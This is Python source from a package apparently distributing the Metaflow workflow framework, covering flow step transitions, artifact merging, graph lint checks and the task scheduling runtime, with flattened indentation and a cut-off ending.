For example, considering the following code:
```
@step
def root(self):
self.split_1 = ['a', 'b', 'c']
self.next(self.nest_1, foreach='split_1')
@step
def nest_1(self):
self.split_2 = ['d', 'e', 'f', 'g']
            self.next(self.nest_2, foreach='split_2')
@step
def nest_2(self):
foo = self.foreach_stack()
```
foo will take the following values in the various tasks for nest_2:
[(0, 3, 'a'), (0, 4, 'd')]
[(0, 3, 'a'), (1, 4, 'e')]
...
[(0, 3, 'a'), (3, 4, 'g')]
[(1, 3, 'b'), (0, 4, 'd')]
...
where each tuple corresponds to:
- the index of the task for that level of the loop
- the number of splits for that level of the loop
- the value for that level of the loop
Note that the last tuple returned in a task corresponds to:
- first element: value returned by self.index
- third element: value returned by self.input
Returns
-------
List[Tuple[int, int, object]]
An array describing the current stack of foreach steps
"""
return [(frame.index, frame.num_splits, self._find_input(stack_index=i))
for i, frame in enumerate(self._foreach_stack)]
def _find_input(self, stack_index=None):
if stack_index is None:
stack_index = len(self._foreach_stack) - 1
if stack_index in self._cached_input:
return self._cached_input[stack_index]
elif self._foreach_stack:
# NOTE this is obviously an O(n) operation which also requires
# downloading the whole input data object in order to find the
# right split. One can override this method with a more efficient
# input data handler if this is a problem.
frame = self._foreach_stack[stack_index]
try:
var = getattr(self, frame.var)
except AttributeError:
# this is where AttributeError happens:
# [ foreach x ]
# [ foreach y ]
# [ inner ]
# [ join y ] <- call self.foreach_stack here,
# self.x is not available
self._cached_input[stack_index] = None
else:
try:
self._cached_input[stack_index] = var[frame.index]
except TypeError:
# __getitem__ not supported, fall back to an iterator
self._cached_input[stack_index] = next(islice(var,
frame.index,
frame.index + 1))
return self._cached_input[stack_index]
def merge_artifacts(self, inputs, exclude=[]):
"""
Merge the artifacts coming from each merge branch (from inputs)
This function takes all the artifacts coming from the branches of a
join point and assigns them to self in the calling step. Only artifacts
not set in the current step are considered. If, for a given artifact, different
values are present on the incoming edges, an error will be thrown (and the artifacts
that "conflict" will be reported).
As a few examples, in the simple graph: A splitting into B and C and joining in D:
A:
self.x = 5
self.y = 6
B:
self.b_var = 1
self.x = from_b
C:
self.x = from_c
D:
merge_artifacts(inputs)
In D, the following artifacts are set:
- y (value: 6), b_var (value: 1)
- if from_b and from_c are the same, x will be accessible and have value from_b
- if from_b and from_c are different, an error will be thrown. To prevent this error,
you need to manually set self.x in D to a merged value (for example the max) prior to
calling merge_artifacts.
Parameters
----------
inputs : List[Steps]
Incoming steps to the join point
        exclude : List[str], optional
            Names of artifacts to exclude from the merge
Raises
------
MetaflowException
This exception is thrown if this is not called in a join step
MergeArtifactsException
This exception is thrown in case of unresolved conflicts
"""
node = self._graph[self._current_step]
if node.type != 'join':
msg = "merge_artifacts can only be called in a join and step *{step}* "\
"is not a join".format(step=self._current_step)
raise MetaflowException(msg)
to_merge = {}
unresolved = []
for inp in inputs:
# available_vars is the list of variables from inp that should be considered
available_vars = ((var, sha) for var, sha in inp._datastore.items()
if (var not in exclude) and (not hasattr(self, var)))
for var, sha in available_vars:
_, previous_sha = to_merge.setdefault(var, (inp, sha))
if previous_sha != sha:
# We have a conflict here
unresolved.append(var)
if unresolved:
# We have unresolved conflicts so we do not set anything and error out
msg = "Step *{step}* cannot merge the following artifacts due to them "\
"having conflicting values:\n[{artifacts}].\nTo remedy this issue, "\
"be sure to explictly set those artifacts (using "\
"self.<artifact_name> = ...) prior to calling merge_artifacts."\
.format(step=self._current_step, artifacts=', '.join(unresolved))
raise MergeArtifactsException(msg, unresolved)
# If things are resolved, we go and fetch from the datastore and set here
for var, (inp, _) in to_merge.items():
setattr(self, var, getattr(inp, var))
def next(self, *dsts, **kwargs):
"""
Indicates the next step to execute at the end of this step
This statement should appear once and only once in each and every step (except the `end`
step). Furthermore, it should be the last statement in the step.
There are several valid formats to specify the next step:
- Straight-line connection: self.next(self.next_step) where `next_step` is a method in
the current class decorated with the `@step` decorator
- Static fan-out connection: self.next(self.step1, self.step2, ...) where `stepX` are
methods in the current class decorated with the `@step` decorator
- Conditional branch:
self.next(self.if_true, self.if_false, condition='boolean_variable')
In this situation, both `if_true` and `if_false` are methods in the current class
decorated with the `@step` decorator and `boolean_variable` is a variable name
in the current class that evaluates to True or False. The `if_true` step will be
            executed if the condition variable evaluates to True and the `if_false` step will
be executed otherwise
- Foreach branch:
self.next(self.foreach_step, foreach='foreach_iterator')
In this situation, `foreach_step` is a method in the current class decorated with the
            `@step` decorator and `foreach_iterator` is a variable name in the current class that
evaluates to an iterator. A task will be launched for each value in the iterator and
each task will execute the code specified by the step `foreach_step`.
Raises
------
InvalidNextException
Raised if the format of the arguments does not match one of the ones given above.
"""
step = self._current_step
foreach = kwargs.pop('foreach', None)
condition = kwargs.pop('condition', None)
if kwargs:
kw = next(iter(kwargs))
msg = "Step *{step}* passes an unknown keyword argument "\
"'{invalid}' to self.next().".format(step=step, invalid=kw)
raise InvalidNextException(msg)
# check: next() is called only once
if self._transition is not None:
msg = "Multiple self.next() calls detected in step *{step}*. "\
"Call self.next() only once.".format(step=step)
raise InvalidNextException(msg)
# check: all destinations are methods of this object
funcs = []
for i, dst in enumerate(dsts):
try:
name = dst.__func__.__name__
except:
msg = "In step *{step}* the {arg}. argument in self.next() is "\
"not a function. Make sure all arguments in self.next() "\
"are methods of the Flow class."\
.format(step=step, arg=i + 1)
raise InvalidNextException(msg)
if not hasattr(self, name):
msg = "Step *{step}* specifies a self.next() transition to an "\
"unknown step, *{name}*.".format(step=step,
name=name)
raise InvalidNextException(msg)
funcs.append(name)
# check: foreach and condition are mutually exclusive
if not (foreach is None or condition is None):
msg = "Step *{step}* has an invalid self.next() transition. "\
"Specify either 'foreach' or 'condition', not both."\
.format(step=step)
raise InvalidNextException(msg)
# check: foreach is valid
if foreach:
if not isinstance(foreach, basestring):
msg = "Step *{step}* has an invalid self.next() transition. "\
"The argument to 'foreach' must be a string."\
.format(step=step)
raise InvalidNextException(msg)
if len(dsts) != 1:
msg = "Step *{step}* has an invalid self.next() transition. "\
"Specify exactly one target for 'foreach'."\
.format(step=step)
raise InvalidNextException(msg)
try:
foreach_iter = getattr(self, foreach)
except:
msg = "Foreach variable *self.{var}* in step *{step}* "\
"does not exist. Check your variable."\
.format(step=step, var=foreach)
raise InvalidNextException(msg)
try:
self._foreach_num_splits = sum(1 for _ in foreach_iter)
except TypeError:
msg = "Foreach variable *self.{var}* in step *{step}* "\
"is not iterable. Check your variable."\
.format(step=step, var=foreach)
raise InvalidNextException(msg)
if self._foreach_num_splits == 0:
msg = "Foreach iterator over *{var}* in step *{step}* "\
"produced zero splits. Check your variable."\
.format(step=step, var=foreach)
raise InvalidNextException(msg)
self._foreach_var = foreach
# check: condition is valid
if condition:
if not isinstance(condition, basestring):
msg = "Step *{step}* has an invalid self.next() transition. "\
"The argument to 'condition' must be a string."\
.format(step=step)
raise InvalidNextException(msg)
if len(dsts) != 2:
msg = "Step *{step}* has an invalid self.next() transition. "\
"Specify two targets for 'condition': The first target "\
"is used if the condition evaluates to true, the second "\
"otherwise.".format(step=step)
raise InvalidNextException(msg)
# check: non-keyword transitions are valid
if foreach is None and condition is None:
if len(dsts) < 1:
msg = "Step *{step}* has an invalid self.next() transition. "\
"Specify at least one step function as an argument in "\
"self.next().".format(step=step)
raise InvalidNextException(msg)
self._transition = (funcs, foreach, condition)
def __str__(self):
step_name = getattr(self, '_current_step', None)
if step_name:
index = ','.join(str(idx) for idx, _, _ in self.foreach_stack())
if index:
inp = self.input
if inp is None:
return '<flow %s step %s[%s]>' %\
(self.name, step_name, index)
else:
inp = str(inp)
if len(inp) > 20:
inp = inp[:20] + '...'
return '<flow %s step %s[%s] (input: %s)>' %\
(self.name, step_name, index, inp)
else:
return '<flow %s step %s>' % (self.name, step_name)
else:
return '<flow %s>' % self.name
def __getstate__(self):
raise MetaflowException("Flows can't be serialized. Maybe you tried "
"to assign *self* or one of the *inputs* "
"to an attribute? Instead of serializing the "
"whole flow, you should choose specific "
"attributes, e.g. *input.some_var*, to be "
"stored.") | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/flowspec.py | flowspec.py |
import re
from .exception import MetaflowException
from .util import all_equal
class LintWarn(MetaflowException):
headline="Validity checker found an issue"
class FlowLinter(object):
def __init__(self):
self.require_static_graph = True
self.require_fundamentals = True
self.require_acyclicity = True
self.require_non_nested_foreach = False
self._checks = []
def _decorate(self, setting, f):
f.attrs.append(setting)
return f
def ensure_static_graph(self, f):
return self._decorate('require_static_graph', f)
def ensure_fundamentals(self, f):
return self._decorate('require_fundamentals', f)
def ensure_acyclicity(self, f):
return self._decorate('require_acyclicity', f)
def ensure_non_nested_foreach(self, f):
return self._decorate('require_non_nested_foreach', f)
def check(self, f):
self._checks.append(f)
f.attrs = []
return f
def run_checks(self, graph, **kwargs):
for check in self._checks:
if any(getattr(self, attr) or kwargs.get(attr)
for attr in check.attrs):
check(graph)
linter = FlowLinter()
@linter.ensure_fundamentals
@linter.check
def check_reserved_words(graph):
RESERVED = {'name',
'next',
'input',
'index',
'cmd'}
msg = 'Step name *%s* is a reserved word. Choose another name for the '\
'step.'
for node in graph:
if node.name in RESERVED:
raise LintWarn(msg % node.name)
@linter.ensure_fundamentals
@linter.check
def check_basic_steps(graph):
msg ="Add %s *%s* step in your flow."
for prefix, node in (('a', 'start'), ('an', 'end')):
if node not in graph:
raise LintWarn(msg % (prefix, node))
@linter.ensure_static_graph
@linter.check
def check_that_end_is_end(graph):
msg0="The *end* step should not have a step.next() transition. "\
"Just remove it."
msg1="The *end* step should not be a join step (it gets an extra "\
"argument). Add a join step before it."
node=graph['end']
if node.has_tail_next or node.invalid_tail_next:
raise LintWarn(msg0, node.tail_next_lineno)
if node.num_args > 1:
raise LintWarn(msg1, node.tail_next_lineno)
@linter.ensure_fundamentals
@linter.check
def check_step_names(graph):
msg =\
"Step *{0.name}* has an invalid name. Only lowercase ascii "\
"characters, underscores, and digits are allowed."
for node in graph:
if re.search('[^a-z0-9_]', node.name) or node.name[0] == '_':
raise LintWarn(msg.format(node), node.func_lineno)
@linter.ensure_fundamentals
@linter.check
def check_num_args(graph):
msg0 =\
"Step {0.name} has too many arguments. Normal steps take only "\
"'self' as an argument. Join steps take 'self' and 'inputs'."
msg1 =\
"Step *{0.name}* is both a join step (it takes an extra argument) "\
"and a split step (it transitions to multiple steps). This is not "\
"allowed. Add a new step so that split and join become separate steps."
msg2 = "Step *{0.name}* is missing the 'self' argument."
for node in graph:
if node.num_args > 2:
raise LintWarn(msg0.format(node), node.func_lineno)
elif node.num_args == 2 and node.type != 'join':
raise LintWarn(msg1.format(node), node.func_lineno)
elif node.num_args == 0:
raise LintWarn(msg2.format(node), node.func_lineno)
@linter.ensure_static_graph
@linter.check
def check_static_transitions(graph):
msg =\
"Step *{0.name}* is missing a self.next() transition to "\
"the next step. Add a self.next() as the last line in the "\
"function."
for node in graph:
if node.type != 'end' and not node.has_tail_next:
raise LintWarn(msg.format(node), node.func_lineno)
@linter.ensure_static_graph
@linter.check
def check_valid_transitions(graph):
msg =\
"Step *{0.name}* specifies an invalid self.next() transition. "\
"Make sure the self.next() expression matches with one of the "\
"supported transition types."
for node in graph:
if node.type != 'end' and\
node.has_tail_next and\
node.invalid_tail_next:
raise LintWarn(msg.format(node), node.tail_next_lineno)
@linter.ensure_static_graph
@linter.check
def check_unknown_transitions(graph):
msg =\
"Step *{0.name}* specifies a self.next() transition to "\
"an unknown step, *{step}*."
for node in graph:
unknown = [n for n in node.out_funcs if n not in graph]
if unknown:
raise LintWarn(msg.format(node, step=unknown[0]),
node.tail_next_lineno)
@linter.ensure_acyclicity
@linter.ensure_static_graph
@linter.check
def check_for_acyclicity(graph):
msg = "There is a loop in your flow: *{0}*. Break the loop "\
"by fixing self.next() transitions."
def check_path(node, seen):
for n in node.out_funcs:
if n in seen:
path = '->'.join(seen + [n])
raise LintWarn(msg.format(path),
node.tail_next_lineno)
else:
check_path(graph[n], seen + [n])
for start in graph:
check_path(start, [])
@linter.ensure_static_graph
@linter.check
def check_for_orphans(graph):
msg =\
"Step *{0.name}* is unreachable from the start step. Add "\
"self.next({0.name}) in another step or remove *{0.name}*."
seen = set(['start'])
def traverse(node):
for n in node.out_funcs:
if n not in seen:
seen.add(n)
traverse(graph[n])
traverse(graph['start'])
nodeset = frozenset(n.name for n in graph)
orphans = nodeset - seen
if orphans:
orphan = graph[list(orphans)[0]]
raise LintWarn(msg.format(orphan), orphan.func_lineno)
@linter.ensure_static_graph
@linter.check
def check_split_join_balance(graph):
msg0 = "Step *end* reached before a split started at step(s) *{roots}* "\
"were joined. Add a join step before *end*."
msg1 = "Step *{0.name}* seems like a join step (it takes an extra input "\
"argument) but an incorrect number of steps (*{paths}*) lead to "\
"it. This join was expecting {num_roots} incoming paths, starting "\
"from splitted step(s) *{roots}*."
msg2 = "Step *{0.name}* seems like a join step (it takes an extra input "\
"argument) but it is not preceded by a split. Ensure that there is "\
"a matching split for every join."
msg3 = "Step *{0.name}* joins steps from unrelated splits. Ensure that "\
"there is a matching join for every split."
def traverse(node, split_stack):
if node.type == 'linear':
new_stack = split_stack
elif node.type in ('split-or', 'split-and', 'foreach'):
new_stack = split_stack + [('split', node.out_funcs)]
elif node.type == 'end':
if split_stack:
split_type, split_roots = split_stack.pop()
roots = ', '.join(split_roots)
raise LintWarn(msg0.format(roots=roots))
elif node.type == 'join':
if split_stack:
split_type, split_roots = split_stack[-1]
new_stack = split_stack[:-1]
if len(node.in_funcs) != len(split_roots):
paths = ', '.join(node.in_funcs)
roots = ', '.join(split_roots)
raise LintWarn(msg1.format(node,
paths=paths,
num_roots=len(split_roots),
roots=roots),
node.func_lineno)
else:
raise LintWarn(msg2.format(node), node.func_lineno)
# check that incoming steps come from the same lineage
# (no cross joins)
def parents(n):
if graph[n].type == 'join':
return tuple(graph[n].split_parents[:-1])
else:
return tuple(graph[n].split_parents)
if not all_equal(map(parents, node.in_funcs)):
raise LintWarn(msg3.format(node), node.func_lineno)
for n in node.out_funcs:
traverse(graph[n], new_stack)
traverse(graph['start'], [])
@linter.ensure_static_graph
@linter.check
def check_empty_foreaches(graph):
msg = "Step *{0.name}* is a foreach split that has no children: "\
"it is followed immeditately by a join step, *{join}*. Add "\
"at least one step between the split and the join."
for node in graph:
if node.type == 'foreach':
joins = [n for n in node.out_funcs if graph[n].type == 'join']
if joins:
raise LintWarn(msg.format(node, join=joins[0]))
@linter.ensure_non_nested_foreach
@linter.check
def check_nested_foreach(graph):
msg = "Nested foreaches are not allowed: Step *{0.name}* is a foreach "\
"split that is nested under another foreach split."
for node in graph:
if node.type == 'foreach':
if any(graph[p].type == 'foreach' for p in node.split_parents):
raise LintWarn(msg.format(node)) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/lint.py | lint.py |
from __future__ import print_function
import json
import os
import sys
import fcntl
import time
import select
import subprocess
from functools import partial
from . import get_namespace
from .metaflow_config import MAX_ATTEMPTS
from .exception import MetaflowException,\
MetaflowInternalError,\
METAFLOW_EXIT_DISALLOW_RETRY
from . import procpoll
from .datastore import DataException, MetaflowDatastoreSet
from .metadata import MetaDatum
from .debug import debug
from .util import to_unicode, compress_list
try:
# python2
import cStringIO
BytesIO = cStringIO.StringIO
except:
# python3
import io
BytesIO = io.BytesIO
MAX_WORKERS=16
MAX_NUM_SPLITS=100
MAX_LOG_SIZE=1024*1024
PROGRESS_INTERVAL = 1000 #ms
# The following is a list of the (data) artifacts used by the runtime while
# executing a flow. These are prefetched during the resume operation by
# leveraging the MetaflowDatastoreSet.
PREFETCH_DATA_ARTIFACTS = ['_foreach_stack', '_task_ok', '_transition']
# TODO option: output dot graph periodically about execution
class NativeRuntime(object):
def __init__(self,
flow,
graph,
datastore,
metadata,
environment,
package,
logger,
entrypoint,
event_logger,
monitor,
run_id=None,
clone_run_id=None,
clone_steps=None,
max_workers=MAX_WORKERS,
max_num_splits=MAX_NUM_SPLITS,
max_log_size=MAX_LOG_SIZE):
if run_id is None:
self._run_id = metadata.new_run_id()
else:
self._run_id = run_id
metadata.register_run_id(run_id)
self._flow = flow
self._graph = graph
self._datastore = datastore
self._metadata = metadata
self._environment = environment
self._logger = logger
self._max_workers = max_workers
self._num_active_workers = 0
self._max_num_splits = max_num_splits
self._max_log_size = max_log_size
self._params_task = None
self._entrypoint = entrypoint
self.event_logger = event_logger
self._monitor = monitor
self._clone_run_id = clone_run_id
self._clone_steps = {} if clone_steps is None else clone_steps
self._origin_ds_set = None
if clone_run_id:
# resume logic
# 0. If clone_run_id is specified, attempt to clone all the
# successful tasks from the flow with `clone_run_id`. And run the
# unsuccessful or not-run steps in the regular fashion.
# 1. With _find_origin_task, for every task in the current run, we
# find the equivalent task in `clone_run_id` using
# pathspec_index=run/step:[index] and verify if this task can be
# cloned.
# 2. If yes, we fire off a clone-only task which copies the
# metadata from the `clone_origin` to pathspec=run/step/task to
# mimic that the resumed run looks like an actual run.
# 3. All steps that couldn't be cloned (either unsuccessful or not
# run) are run as regular tasks.
# Lastly, to improve the performance of the cloning process, we
# leverage the MetaflowDatastoreSet abstraction to prefetch the
# entire DAG of `clone_run_id` and relevant data artifacts
# (see PREFETCH_DATA_ARTIFACTS) so that the entire runtime can
# access the relevant data from cache (instead of going to the datastore
# after the first prefetch).
logger(
'Gathering required information to resume run (this may take a bit of time)...')
self._origin_ds_set = \
MetaflowDatastoreSet(
datastore,
flow.name,
clone_run_id,
metadata=metadata,
event_logger=event_logger,
monitor=monitor,
prefetch_data_artifacts=PREFETCH_DATA_ARTIFACTS)
self._run_queue = []
self._poll = procpoll.make_poll()
self._workers = {} # fd -> subprocess mapping
self._finished = {}
self._is_cloned = {}
for step in flow:
for deco in step.decorators:
deco.runtime_init(flow,
graph,
package,
self._run_id)
def _new_task(self, step, input_paths=None, **kwargs):
if input_paths is None:
may_clone = True
else:
may_clone = all(self._is_cloned[path] for path in input_paths)
if step in self._clone_steps:
may_clone = False
if step == '_parameters':
decos = []
else:
decos = getattr(self._flow, step).decorators
return Task(self._datastore,
self._flow,
step,
self._run_id,
self._metadata,
self._environment,
self._entrypoint,
self.event_logger,
self._monitor,
input_paths=input_paths,
may_clone=may_clone,
clone_run_id=self._clone_run_id,
origin_ds_set=self._origin_ds_set,
decos=decos,
logger=self._logger,
**kwargs)
@property
def run_id(self):
return self._run_id
def persist_parameters(self, task_id=None):
task = self._new_task('_parameters', task_id=task_id)
if not task.is_cloned:
task.persist(self._flow)
self._params_task = task.path
self._is_cloned[task.path] = task.is_cloned
def execute(self):
self._logger('Workflow starting (run-id %s):' % self._run_id,
system_msg=True)
if self._params_task:
self._queue_push('start', {'input_paths': [self._params_task]})
else:
self._queue_push('start', {})
progress_tstamp = time.time()
try:
# main scheduling loop
exception = None
while self._run_queue or\
self._num_active_workers > 0:
# 1. are any of the current workers finished?
finished_tasks = list(self._poll_workers())
# 2. push new tasks triggered by the finished tasks to the queue
self._queue_tasks(finished_tasks)
# 3. if there are available worker slots, pop and start tasks
# from the queue.
self._launch_workers()
if time.time() - progress_tstamp > PROGRESS_INTERVAL:
progress_tstamp = time.time()
msg = "%d tasks are running: %s." %\
(self._num_active_workers, 'e.g. ...') # TODO
self._logger(msg, system_msg=True)
msg = "%d tasks are waiting in the queue." %\
len(self._run_queue)
self._logger(msg, system_msg=True)
msg = "%d steps are pending: %s." %\
(0, 'e.g. ...') # TODO
self._logger(msg, system_msg=True)
except KeyboardInterrupt as ex:
self._logger('Workflow interrupted.', system_msg=True, bad=True)
self._killall()
exception = ex
raise
except Exception as ex:
self._logger('Workflow failed.', system_msg=True, bad=True)
self._killall()
exception = ex
raise
finally:
# on finish clean tasks
for step in self._flow:
for deco in step.decorators:
deco.runtime_finished(exception)
# assert that end was executed and it was successful
if ('end', ()) in self._finished:
self._logger('Done!', system_msg=True)
else:
raise MetaflowInternalError('The *end* step was not successful '
'by the end of flow.')
def _killall(self):
for worker in self._workers.values():
worker.kill()
# give killed workers a chance to flush their logs to datastore
for _ in range(3):
list(self._poll_workers())
# Store the parameters needed for task creation, so that pushing items
# onto the run_queue is an inexpensive operation.
def _queue_push(self, step, task_kwargs):
self._run_queue.insert(0, (step, task_kwargs))
def _queue_pop(self):
return self._run_queue.pop() if self._run_queue else None
def _queue_task_join(self, task, next_steps):
# if the next step is a join, we need to check that
# all input tasks for the join have finished before queuing it.
# CHECK: this condition should be enforced by the linter but
# let's assert that the assumption holds
if len(next_steps) > 1:
msg = 'Step *{step}* transitions to a join and another '\
'step. The join must be the only transition.'
raise MetaflowInternalError(task, msg.format(step=task.step))
else:
next_step = next_steps[0]
# matching_split is the split-parent of the finished task
matching_split = self._graph[self._graph[next_step].split_parents[-1]]
step_name, foreach_stack = task.finished_id
if matching_split.type == 'foreach':
# next step is a foreach join
def siblings(foreach_stack):
top = foreach_stack[-1]
bottom = list(foreach_stack[:-1])
for index in range(top.num_splits):
yield tuple(bottom + [top._replace(index=index)])
# required tasks are all split-siblings of the finished task
required_tasks = [self._finished.get((task.step, s))
for s in siblings(foreach_stack)]
join_type = 'foreach'
else:
# next step is a split-and
# required tasks are all branches joined by the next step
required_tasks = [self._finished.get((step, foreach_stack))
for step in self._graph[next_step].in_funcs]
join_type = 'linear'
if all(required_tasks):
# all tasks to be joined are ready. Schedule the next join step.
self._queue_push(next_step,
{'input_paths': required_tasks,
'join_type': join_type})
def _queue_task_foreach(self, task, next_steps):
# CHECK: this condition should be enforced by the linter but
# let's assert that the assumption holds
if len(next_steps) > 1:
msg = 'Step *{step}* makes a foreach split but it defines '\
'multiple transitions. Specify only one transition '\
'for foreach.'
raise MetaflowInternalError(msg.format(step=task.step))
else:
next_step = next_steps[0]
num_splits = task.results['_foreach_num_splits']
if num_splits > self._max_num_splits:
msg = 'Foreach in step *{step}* yielded {num} child steps '\
'which is more than the current maximum of {max} '\
'children. You can raise the maximum with the '\
'--max-num-splits option. '
raise TaskFailed(task, msg.format(step=task.step,
num=num_splits,
max=self._max_num_splits))
# schedule all splits
for i in range(num_splits):
self._queue_push(next_step,
{'split_index': str(i),
'input_paths': [task.path]})
def _queue_tasks(self, finished_tasks):
# finished tasks include only successful tasks
for task in finished_tasks:
self._finished[task.finished_id] = task.path
self._is_cloned[task.path] = task.is_cloned
# CHECK: ensure that runtime transitions match with
# statically inferred transitions
trans = task.results.get('_transition')
if trans:
next_steps = trans[0]
foreach = trans[1]
else:
next_steps = []
foreach = None
expected = self._graph[task.step].out_funcs
if next_steps != expected:
msg = 'Based on static analysis of the code, step *{step}* '\
'was expected to transition to step(s) *{expected}*. '\
'However, when the code was executed, self.next() was '\
'called with *{actual}*. Make sure there is only one '\
'unconditional self.next() call in the end of your '\
'step. '
raise MetaflowInternalError(msg.format(step=task.step,
expected=', '.join(
expected),
actual=', '.join(next_steps)))
# Different transition types require different treatment
if any(self._graph[f].type == 'join' for f in next_steps):
# Next step is a join
self._queue_task_join(task, next_steps)
elif foreach:
# Next step is a foreach child
self._queue_task_foreach(task, next_steps)
else:
# Next steps are normal linear steps
for step in next_steps:
self._queue_push(step, {'input_paths': [task.path]})
def _poll_workers(self):
if self._workers:
for event in self._poll.poll(PROGRESS_INTERVAL):
worker = self._workers.get(event.fd)
if worker:
if event.can_read:
worker.read_logline(event.fd)
if event.is_terminated:
returncode = worker.terminate()
for fd in worker.fds():
self._poll.remove(fd)
del self._workers[fd]
self._num_active_workers -= 1
task = worker.task
if returncode:
# worker did not finish successfully
if worker.killed or\
returncode == METAFLOW_EXIT_DISALLOW_RETRY:
self._logger("This failed task will not be "
"retried.", system_msg=True)
else:
if task.retries < task.user_code_retries +\
task.error_retries:
self._retry_worker(worker)
else:
raise TaskFailed(task)
else:
# worker finished successfully
yield task
def _launch_workers(self):
while self._run_queue and self._num_active_workers < self._max_workers:
step, task_kwargs = self._queue_pop()
# Initialize the task (which can be expensive using remote datastores)
# before launching the worker so that cost is amortized over time, instead
# of doing it during _queue_push.
task = self._new_task(step, **task_kwargs)
self._launch_worker(task)
def _retry_worker(self, worker):
worker.task.retries += 1
if worker.task.retries >= MAX_ATTEMPTS:
# any results with an attempt ID >= MAX_ATTEMPTS will be ignored
# by datastore, so running a task with such a retry count would
# be pointless and dangerous
raise MetaflowInternalError("Too many task attempts (%d)! "
"MAX_ATTEMPTS exceeded."
% worker.task.retries)
worker.task.new_attempt()
self._launch_worker(worker.task)
def _launch_worker(self, task):
worker = Worker(task, self._max_log_size)
for fd in worker.fds():
self._workers[fd] = worker
self._poll.add(fd)
self._num_active_workers += 1
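# Illustrative sketch (not used by the scheduler above) of the sibling
# enumeration that _queue_task_join performs for foreach joins: the join is
# queued only once a finished task exists for every index of the topmost
# foreach frame. The Frame namedtuple and the values below are hypothetical
# stand-ins for the runtime's foreach stack entries.
def _foreach_siblings_sketch():
from collections import namedtuple
Frame = namedtuple('Frame', ['step', 'var', 'num_splits', 'index'])
stack = (Frame('fan_out', 'items', 3, 1),)
top, bottom = stack[-1], list(stack[:-1])
siblings = [tuple(bottom + [top._replace(index=i)])
for i in range(top.num_splits)]
# siblings enumerates indices 0, 1 and 2 of the same foreach split
return siblings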
class Task(object):
clone_pathspec_mapping = {}
def __init__(self,
datastore,
flow,
step,
run_id,
metadata,
environment,
entrypoint,
event_logger,
monitor,
input_paths=None,
split_index=None,
clone_run_id=None,
origin_ds_set=None,
may_clone=False,
join_type=None,
logger=None,
task_id=None,
decos=[]):
if task_id is None:
task_id = str(metadata.new_task_id(run_id, step))
else:
# task_id is preset only by persist_parameters()
metadata.register_task_id(run_id, step, task_id)
self.step = step
self.flow_name = flow.name
self.run_id = run_id
self.task_id = task_id
self.input_paths = input_paths
self.split_index = split_index
self.decos = decos
self.entrypoint = entrypoint
self.environment = environment
self.environment_type = self.environment.TYPE
self.clone_run_id = clone_run_id
self.clone_origin = None
self.origin_ds_set = origin_ds_set
self.metadata = metadata
self.event_logger = event_logger
self.monitor = monitor
self._logger = logger
self._path = '%s/%s/%s' % (self.run_id, self.step, self.task_id)
self.retries = 0
self.user_code_retries = 0
self.error_retries = 0
self.tags = metadata.sticky_tags
self.event_logger_type = self.event_logger.logger_type
self.monitor_type = monitor.monitor_type
self.metadata_type = metadata.TYPE
self.datastore_type = datastore.TYPE
self._datastore = datastore
self.datastore_sysroot = datastore.datastore_root
self._results_ds = None
if clone_run_id and may_clone:
self._is_cloned = self._attempt_clone(clone_run_id, join_type)
else:
self._is_cloned = False
# Open the output datastore only if the task is not being cloned.
if not self._is_cloned:
self.new_attempt()
for deco in decos:
deco.runtime_task_created(self._ds,
task_id,
split_index,
input_paths,
self._is_cloned)
# determine the number of retries of this task
user_code_retries, error_retries = deco.step_task_retry_count()
self.user_code_retries = max(self.user_code_retries,
user_code_retries)
self.error_retries = max(self.error_retries, error_retries)
def new_attempt(self):
self._ds = self._datastore(self.flow_name,
run_id=self.run_id,
step_name=self.step,
task_id=self.task_id,
mode='w',
metadata=self.metadata,
attempt=self.retries,
event_logger=self.event_logger,
monitor=self.monitor)
def log(self, msg, system_msg=False, pid=None):
if pid:
prefix = '[%s (pid %s)] ' % (self._path, pid)
else:
prefix = '[%s] ' % self._path
self._logger(msg, head=prefix, system_msg=system_msg)
sys.stdout.flush()
def _find_origin_task(self, clone_run_id, join_type):
if self.step == '_parameters':
pathspec = '%s/_parameters[]' % clone_run_id
origin = self.origin_ds_set.get_with_pathspec_index(pathspec)
if origin is None:
# This is just for usability: We could rerun the whole flow
# if an unknown clone_run_id is provided but probably this is
# not what the user intended, so raise a warning
raise MetaflowException("Resume could not find run id *%s*" %
clone_run_id)
else:
return origin
else:
# all inputs must have the same foreach stack, so we can safely
# pick the first one
parent_pathspec = self.input_paths[0]
origin_parent_pathspec = \
self.clone_pathspec_mapping[parent_pathspec]
parent = self.origin_ds_set.get_with_pathspec(origin_parent_pathspec)
# Parent should be non-None since we only clone the child if the parent
# was successfully cloned.
foreach_stack = parent['_foreach_stack']
if join_type == 'foreach':
# foreach-join pops the topmost index
index = ','.join(str(s.index) for s in foreach_stack[:-1])
elif self.split_index:
# foreach-split pushes a new index
index = ','.join([str(s.index) for s in foreach_stack] +
[str(self.split_index)])
else:
# all other transitions keep the parent's foreach stack intact
index = ','.join(str(s.index) for s in foreach_stack)
pathspec = '%s/%s[%s]' % (clone_run_id, self.step, index)
return self.origin_ds_set.get_with_pathspec_index(pathspec)
def _attempt_clone(self, clone_run_id, join_type):
origin = self._find_origin_task(clone_run_id, join_type)
if origin and origin['_task_ok']:
# Store the mapping from current_pathspec -> origin_pathspec which
# will be useful for looking up origin_ds_set in find_origin_task.
self.clone_pathspec_mapping[self._path] = origin.pathspec
if self.step == '_parameters':
# Clone in place without relying on run_queue.
self.new_attempt()
self._ds.clone(origin)
self._ds.done()
else:
self.log("Cloning results of a previously run task %s"
% origin.pathspec, system_msg=True)
# Store the origin pathspec in clone_origin so this can be run
# as a task by the runtime.
self.clone_origin = origin.pathspec
# Save a call to creating the results_ds since its same as origin.
self._results_ds = origin
return True
else:
return False
@property
def path(self):
return self._path
@property
def results(self):
if self._results_ds:
return self._results_ds
else:
self._results_ds = self._datastore(self.flow_name,
run_id=self.run_id,
step_name=self.step,
task_id=self.task_id,
mode='r',
metadata=self.metadata,
event_logger=self.event_logger,
monitor=self.monitor)
return self._results_ds
@property
def finished_id(self):
# note: id is not available before the task has finished
return (self.step, tuple(self.results['_foreach_stack']))
@property
def is_cloned(self):
return self._is_cloned
def persist(self, flow):
# this is used to persist parameters before the start step
flow._task_ok = flow._success = True
flow._foreach_stack = []
self._ds.persist(flow)
self._ds.done()
def save_logs(self, logtype, logs):
location = self._ds.save_log(logtype, logs)
datum = [MetaDatum(field='log_location_%s' % logtype,
value=json.dumps({
